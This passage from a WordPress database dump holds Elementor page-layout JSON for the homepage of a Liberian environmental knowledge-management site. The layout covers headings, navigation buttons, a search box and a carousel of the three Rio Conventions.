],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13193,2138,'_elementor_version','2.7.5'),(13194,2138,'_elementor_template_type','wp-page'),(13195,2138,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13198,2139,'_wp_page_template','default'),(13199,2139,'_elementor_edit_mode','builder'),(13200,2139,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(0,0,0,0.15)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\"